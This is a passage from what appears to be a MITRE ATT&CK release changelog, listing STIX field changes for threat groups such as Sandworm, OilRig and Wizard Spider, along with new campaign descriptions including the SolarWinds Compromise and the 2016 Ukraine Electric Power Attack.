external_references[13]['description']Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[13]['url']https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[14]['source_name']NCSC Sandworm Feb 2020Microsoft Prestige ransomware October 2022
external_references[14]['description']NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.
external_references[14]['url']https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisoryhttps://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
external_references[15]['source_name']USDOJ Sandworm Feb 2020InfoSecurity Sandworm Oct 2014
external_references[15]['description']Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[15]['url']https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.htmlhttps://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[16]['source_name']US District Court Indictment GRU Unit 74455 October 2020NCSC Sandworm Feb 2020
external_references[16]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[16]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[17]['source_name']Secureworks IRON VIKING USDOJ Sandworm Feb 2020
external_references[17]['description']Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[17]['url']https://www.secureworks.com/research/threat-profiles/iron-vikinghttps://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[18]['source_name']UK NCSC Olympic Attacks October 2020US District Court Indictment GRU Unit 74455 October 2020
external_references[18]['description']UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[18]['url']https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-gameshttps://www.justice.gov/opa/press-release/file/1328521/download
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.23.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRIDIUM
external_references{'source_name': 'Secureworks IRON VIKING ', 'description': 'Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-viking'}
external_references{'source_name': 'UK NCSC Olympic Attacks October 2020', 'description': 'UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.', 'url': 'https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games'}
Minor Version Changes

[G0037] FIN6

Current version: 3.3

Version changed from: 3.2 → 3.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 20:11:01.957000+00:002023-03-22 03:50:17.471000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.23.3

[G0046] FIN7

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-20 20:06:44.706000+00:002023-03-22 03:51:04.185000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2

[G1001] HEXANE

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-31 22:16:30.454000+00:002023-03-22 04:43:59.082000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_domains[0]ics-attackenterprise-attack
x_mitre_domains[1]enterprise-attackics-attack
x_mitre_version2.02.1

[G0032] Lazarus Group

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-23 15:30:44.196000+00:002023-03-30 19:01:41.451000+00:00
external_references[6]['url']https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.13.2

[G0049] OilRig

Current version: 3.1

Version changed from: 3.0 → 3.1


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of sectors, including financial, government>rgeted a variety of sectors, including financial, government
>, energy, chemical, and telecommunications. It appears the g>, energy, chemical, and telecommunications. It appears the g
>roup carries out supply chain attacks, leveraging the trust >roup carries out supply chain attacks, leveraging the trust 
>relationship between organizations to attack their primary t>relationship between organizations to attack their primary t
>argets. FireEye assesses that the group works on behalf of t>argets. FireEye assesses that the group works on behalf of t
>he Iranian government based on infrastructure details that c>he Iranian government based on infrastructure details that c
>ontain references to Iran, use of Iranian infrastructure, an>ontain references to Iran, use of Iranian infrastructure, an
>d targeting that aligns with nation-state interests.(Citatio>d targeting that aligns with nation-state interests.(Citatio
>n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja>n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja
>n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo >n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo 
>Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(C>Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)
>itation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT>(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGE
> July 2018)>NT July 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referenceshttps://www.secureworks.com/research/threat-profiles/cobalt-gypsy
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_referenceshttps://pan-unit42.github.io/playbook_viewer/
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 20:18:52.733000+00:002023-02-06 20:58:52.317000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
external_references[5]['source_name']Check Point APT34 April 2021Evasive Serpens
external_references[5]['description']Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.(Citation: Unit42 OilRig Playbook 2023)
external_references[6]['source_name']ClearSky OilRig Jan 2017Check Point APT34 April 2021
external_references[6]['description']ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
external_references[6]['url']http://www.clearskysec.com/oilrig/https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_references[7]['source_name']Palo Alto OilRig May 2016ClearSky OilRig Jan 2017
external_references[7]['description']Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
external_references[7]['url']http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/http://www.clearskysec.com/oilrig/
external_references[8]['source_name']Palo Alto OilRig April 2017Palo Alto OilRig May 2016
external_references[8]['description']Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
external_references[8]['url']http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
external_references[9]['source_name']Palo Alto OilRig Oct 2016Palo Alto OilRig April 2017
external_references[9]['description']Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
external_references[9]['url']http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/
external_references[10]['source_name']Unit 42 QUADAGENT July 2018Palo Alto OilRig Oct 2016
external_references[10]['description']Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
external_references[10]['url']https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
external_references[11]['source_name']Crowdstrike Helix Kitten Nov 2018Unit 42 QUADAGENT July 2018
external_references[11]['description']Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
external_references[11]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
external_references[12]['source_name']FireEye APT34 Dec 2017Crowdstrike Helix Kitten Nov 2018
external_references[12]['description']Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
external_references[12]['url']https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.htmlhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
external_references[13]['source_name']Secureworks COBALT GYPSY Threat ProfileFireEye APT34 Dec 2017
external_references[13]['description']Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
external_references[13]['url']https://www.secureworks.com/research/threat-profiles/cobalt-gypsyhttps://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
external_references[14]['source_name']APT34Secureworks COBALT GYPSY Threat Profile
external_references[14]['description']This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.
external_references[15]['source_name']Unit 42 Playbook Dec 2017APT34
external_references[15]['description']Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesEvasive Serpens
external_references{'source_name': 'Unit 42 Playbook Dec 2017', 'description': 'Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.', 'url': 'https://pan-unit42.github.io/playbook_viewer/'}
external_references{'source_name': 'Unit42 OilRig Playbook 2023', 'description': 'Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.', 'url': 'https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens'}

[G0102] Wizard Spider

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 17:27:41.194000+00:002023-03-22 05:44:27.289000+00:00
external_references[1]['source_name']UNC1878Grim Spider
external_references[1]['description'](Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)
external_references[2]['source_name']TEMP.MixMasterUNC1878
external_references[2]['description'](Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)
external_references[3]['source_name']Grim SpiderTEMP.MixMaster
external_references[3]['description'](Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye Ryuk and Trickbot January 2019)
external_references[4]['source_name']CrowdStrike Ryuk January 2019DHS/CISA Ransomware Targeting Healthcare October 2020
external_references[4]['description']Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.
external_references[4]['url']https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/https://us-cert.cisa.gov/ncas/alerts/aa20-302a
external_references[5]['source_name']DHS/CISA Ransomware Targeting Healthcare October 2020FireEye Ryuk and Trickbot January 2019
external_references[5]['description']DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.
external_references[5]['url']https://us-cert.cisa.gov/ncas/alerts/aa20-302ahttps://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
external_references[6]['source_name']CrowdStrike Wizard Spider October 2020CrowdStrike Ryuk January 2019
external_references[6]['description']Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
external_references[6]['url']https://www.crowdstrike.com/blog/wizard-spider-adversary-update/https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
external_references[7]['source_name']FireEye KEGTAP SINGLEMALT October 2020CrowdStrike Grim Spider May 2019
external_references[7]['description']Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.htmlhttps://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/
external_references[8]['source_name']FireEye Ryuk and Trickbot January 2019FireEye KEGTAP SINGLEMALT October 2020
external_references[8]['description']Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.
external_references[8]['url']https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.htmlhttps://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
external_references[9]['source_name']CrowdStrike Grim Spider May 2019CrowdStrike Wizard Spider October 2020
external_references[9]['description']John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
external_references[9]['url']https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
x_mitre_version2.02.1
Patches

[G0064] APT33

Current version: 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-23 21:22:08.170000+00:002023-03-08 22:07:25.123000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[G0035] Dragonfly

Current version: 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 22:09:02.443000+00:002023-03-08 22:03:28.170000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[G0088] TEMP.Veles

Current version: 1.3

Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 16:22:20.856000+00:002022-11-30 22:46:40.135000+00:00
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
external_references[4]['source_name']FireEye TEMP.Veles 2018 FireEye TRITON 2019
external_references[4]['description']FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.htmlhttps://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
external_references[5]['source_name']FireEye TRITON 2019FireEye TEMP.Veles JSON April 2019
external_references[5]['description']Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.htmlhttps://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html
external_references[6]['source_name']FireEye TEMP.Veles JSON April 2019Pylos Xenotime 2019
external_references[6]['description']Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.
external_references[6]['url']https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.htmlhttps://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/
external_references[7]['source_name']Pylos Xenotime 2019XENOTIME
external_references[7]['description']Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'XENOTIME', 'description': 'The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )'}

Campaigns

enterprise-attack

New Campaigns

[C0025] 2016 Ukraine Electric Power Attack

Current version: 1.0

Description: [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)


[C0017] C0017

Current version: 1.0

Description: [C0017](https://attack.mitre.org/campaigns/C0017) was an [APT41](https://attack.mitre.org/groups/G0096) campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of [C0017](https://attack.mitre.org/campaigns/C0017) are unknown, however [APT41](https://attack.mitre.org/groups/G0096) was observed exfiltrating Personal Identifiable Information (PII).(Citation: Mandiant APT41)


[C0018] C0018

Current version: 1.0

Description: [C0018](https://attack.mitre.org/campaigns/C0018) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://attack.mitre.org/software/S1053) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://attack.mitre.org/software/S1053).(Citation: Costa AvosLocker May 2022)(Citation: Cisco Talos Avos Jun 2022)


[C0021] C0021

Current version: 1.0

Description: [C0021](https://attack.mitre.org/campaigns/C0021) was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. [C0021](https://attack.mitre.org/campaigns/C0021)'s technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected [APT29](https://attack.mitre.org/groups/G0016) activity.(Citation: Microsoft Unidentified Dec 2018)(Citation: FireEye APT29 Nov 2018)


[C0022] Operation Dream Job

Current version: 1.0

Description: [Operation Dream Job](https://attack.mitre.org/campaigns/C0022) was a cyber espionage operation likely conducted by [Lazarus Group](https://attack.mitre.org/groups/G0032) that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), Operation North Star, and Operation Interception; by 2022 security researchers described [Operation Dream Job](https://attack.mitre.org/campaigns/C0022) as an umbrella term covering both Operation Interception and Operation North Star.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)(Citation: The Hacker News Lazarus Aug 2022)


[C0023] Operation Ghost

Current version: 1.0

Description: [Operation Ghost](https://attack.mitre.org/campaigns/C0023) was an [APT29](https://attack.mitre.org/groups/G0016) campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.(Citation: ESET Dukes October 2019)


[C0024] SolarWinds Compromise

Current version: 1.0

Description: The [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) was a sophisticated supply chain cyber operation conducted by [APT29](https://attack.mitre.org/groups/G0016) that was discovered in mid-December 2020. [APT29](https://attack.mitre.org/groups/G0016) used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: SolarWinds Advisory Dec 2020)(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Volexity SolarWinds)(Citation: CrowdStrike StellarParticle January 2022)(Citation: Unit 42 SolarStorm December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: Microsoft Internal Solorigate Investigation Blog) In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to Russia's Foreign Intelligence Service (SVR); public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)(Citation: Mandiant UNC2452 APT29 April 2022) The US government assessed that of the approximately 18,000 affected public and private sector customers of Solar Winds’ Orion product, a much smaller number were compromised by follow-on [APT29](https://attack.mitre.org/groups/G0016) activity on their systems.(Citation: USG Joint Statement SolarWinds January 2021)

Minor Version Changes

[C0001] Frankenstein

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-21 15:15:43.055000+00:002023-03-22 03:55:03.775000+00:00
x_mitre_attack_spec_version3.0.03.1.0
x_mitre_version1.01.1

[C0012] Operation CuckooBees

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 15:10:42.515000+00:002023-03-22 05:06:05.468000+00:00
x_mitre_attack_spec_version3.0.03.1.0
x_mitre_version1.01.1

[C0014] Operation Wocao

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 17:42:00.940000+00:002023-03-22 05:07:13.071000+00:00
x_mitre_attack_spec_version3.0.03.1.0
x_mitre_version1.01.1

ics-attack

New Campaigns

[C0025] 2016 Ukraine Electric Power Attack

Current version: 1.0

Description: [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)


[C0020] Maroochy Water Breach

Current version: 1.0

Description: [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020) was an incident in 2000 where an adversary leveraged the local government’s wastewater control system and stolen engineering equipment to disrupt and eventually release 800,000 liters of raw sewage into the local community.(Citation: Marshall Abrams July 2008)

Mitigations

enterprise-attack

Minor Version Changes

[M1047] Audit

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 15:52:12.722000+00:002023-03-31 14:50:47.704000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[M1028] Operating System Configuration

Current version: 1.2

